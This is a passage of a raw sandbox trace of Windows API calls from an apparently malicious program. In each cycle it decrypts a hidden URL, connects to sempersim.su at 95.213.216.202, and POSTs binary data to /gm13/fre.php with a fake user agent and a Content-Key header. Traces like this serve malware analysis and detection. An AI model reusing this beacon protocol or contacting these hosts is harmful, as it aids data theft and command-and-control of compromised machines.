hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0236.626] GetProcessHeap () returned 0x620000 [0236.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0236.626] GetProcessHeap () returned 0x620000 [0236.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0236.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1b4) returned 0x3b0 [0236.628] Sleep (dwMilliseconds=0xea60) [0236.642] GetProcessHeap () returned 0x620000 [0236.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6432d8 [0236.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.643] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0236.658] GetProcessHeap () returned 0x620000 [0236.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0236.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.659] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0236.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.660] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.660] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.660] GetProcessHeap () returned 0x620000 [0236.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0236.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.662] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6432d8, pdwDataLen=0x19fcfc | out: pbData=0x6432d8, pdwDataLen=0x19fcfc) returned 1 [0236.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.663] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0236.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.664] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0236.664] GetProcessHeap () returned 0x620000 [0236.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645630 [0236.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.665] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.666] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.695] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.696] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.696] GetProcessHeap () returned 0x620000 [0236.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0236.697] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0236.697] GetProcessHeap () returned 0x620000 [0236.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0236.697] GetProcessHeap () returned 0x620000 [0236.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645630 | out: hHeap=0x620000) returned 1 [0236.761] GetProcessHeap () returned 0x620000 [0236.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6432d8 | out: hHeap=0x620000) returned 1 [0236.761] GetProcessHeap () returned 0x620000 [0236.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0236.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.769] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0236.786] GetProcessHeap () returned 0x620000 [0236.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0236.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.787] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0236.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.788] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.789] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.789] GetProcessHeap () returned 0x620000 [0236.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0236.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.791] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0236.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.794] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0236.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0236.795] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0236.795] GetProcessHeap () returned 0x620000 [0236.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0236.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.796] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0236.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.797] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0236.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.798] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0236.798] GetProcessHeap () returned 0x620000 [0236.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0236.798] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0236.812] GetProcessHeap () returned 0x620000 [0236.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0236.812] socket (af=2, type=1, protocol=6) returned 0x3b4 [0236.812] connect (s=0x3b4, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0236.862] FreeAddrInfoW (pAddrInfo=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0236.862] GetProcessHeap () returned 0x620000 [0236.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0236.862] GetProcessHeap () returned 0x620000 [0236.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0236.862] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0236.863] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0236.863] GetProcessHeap () returned 0x620000 [0236.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0236.863] GetProcessHeap () returned 0x620000 [0236.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0236.864] GetProcessHeap () returned 0x620000 [0236.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642f30 [0236.864] GetProcessHeap () returned 0x620000 [0236.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0236.865] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0236.865] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0236.866] GetProcessHeap () returned 0x620000 [0236.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0236.866] GetProcessHeap () returned 0x620000 [0236.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0236.866] send (s=0x3b4, buf=0x63a880*, len=237, flags=0) returned 237 [0236.867] send (s=0x3b4, buf=0x6421e0*, len=159, flags=0) returned 159 [0236.867] GetProcessHeap () returned 0x620000 [0236.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0236.867] recv (in: s=0x3b4, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0238.422] GetProcessHeap () returned 0x620000 [0238.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0238.423] GetProcessHeap () returned 0x620000 [0238.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0238.423] GetProcessHeap () returned 0x620000 [0238.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0238.423] GetProcessHeap () returned 0x620000 [0238.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0238.424] closesocket (s=0x3b4) returned 0 [0238.424] GetProcessHeap () returned 0x620000 [0238.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0238.425] GetProcessHeap () returned 0x620000 [0238.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0238.425] GetProcessHeap () returned 0x620000 [0238.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0238.425] GetProcessHeap () returned 0x620000 [0238.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0238.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5f8) returned 0x3b4 [0238.428] Sleep (dwMilliseconds=0xea60) [0238.436] GetProcessHeap () returned 0x620000 [0238.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643518 [0238.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0238.455] GetProcessHeap () returned 0x620000 [0238.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0238.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.456] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0238.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.457] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.458] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.458] GetProcessHeap () returned 0x620000 [0238.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0238.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.459] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643518, pdwDataLen=0x19fcfc | out: pbData=0x643518, pdwDataLen=0x19fcfc) returned 1 [0238.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.460] CryptDestroyKey (hKey=0x62d710) returned 1 [0238.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.461] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0238.461] GetProcessHeap () returned 0x620000 [0238.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646770 [0238.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.462] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.463] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.470] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.470] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.470] GetProcessHeap () returned 0x620000 [0238.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0238.471] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.471] GetProcessHeap () returned 0x620000 [0238.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0238.471] GetProcessHeap () returned 0x620000 [0238.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646770 | out: hHeap=0x620000) returned 1 [0238.471] GetProcessHeap () returned 0x620000 [0238.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643518 | out: hHeap=0x620000) returned 1 [0238.472] GetProcessHeap () returned 0x620000 [0238.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643050 [0238.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.473] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.478] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0238.488] GetProcessHeap () returned 0x620000 [0238.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0238.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.489] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0238.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.490] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.491] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.491] GetProcessHeap () returned 0x620000 [0238.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0238.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.492] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643050, pdwDataLen=0x19fcfc | out: pbData=0x643050, pdwDataLen=0x19fcfc) returned 1 [0238.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.493] CryptDestroyKey (hKey=0x62d710) returned 1 [0238.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0238.493] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0238.493] GetProcessHeap () returned 0x620000 [0238.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646998 [0238.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.494] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0238.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.495] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0238.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.499] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0238.499] GetProcessHeap () returned 0x620000 [0238.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0238.499] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0238.501] GetProcessHeap () returned 0x620000 [0238.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0238.501] socket (af=2, type=1, protocol=6) returned 0x3b8 [0238.501] connect (s=0x3b8, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0238.551] FreeAddrInfoW (pAddrInfo=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0238.551] GetProcessHeap () returned 0x620000 [0238.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0238.551] GetProcessHeap () returned 0x620000 [0238.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0238.551] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0238.552] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0238.552] GetProcessHeap () returned 0x620000 [0238.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0238.552] GetProcessHeap () returned 0x620000 [0238.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0238.553] GetProcessHeap () returned 0x620000 [0238.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0238.553] GetProcessHeap () returned 0x620000 [0238.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0238.554] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0238.554] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0238.554] GetProcessHeap () returned 0x620000 [0238.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0238.555] GetProcessHeap () returned 0x620000 [0238.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0238.555] send (s=0x3b8, buf=0x63a880*, len=237, flags=0) returned 237 [0238.556] send (s=0x3b8, buf=0x6421e0*, len=159, flags=0) returned 159 [0238.556] GetProcessHeap () returned 0x620000 [0238.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0238.556] recv (in: s=0x3b8, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0240.577] GetProcessHeap () returned 0x620000 [0240.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0240.577] GetProcessHeap () returned 0x620000 [0240.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0240.577] GetProcessHeap () returned 0x620000 [0240.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0240.578] GetProcessHeap () returned 0x620000 [0240.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0240.578] closesocket (s=0x3b8) returned 0 [0240.578] GetProcessHeap () returned 0x620000 [0240.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0240.579] GetProcessHeap () returned 0x620000 [0240.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646998 | out: hHeap=0x620000) returned 1 [0240.579] GetProcessHeap () returned 0x620000 [0240.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0240.580] GetProcessHeap () returned 0x620000 [0240.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0240.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7b4) returned 0x3b8 [0240.582] Sleep (dwMilliseconds=0xea60) [0240.589] GetProcessHeap () returned 0x620000 [0240.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0240.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0240.607] GetProcessHeap () returned 0x620000 [0240.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0240.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0240.609] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 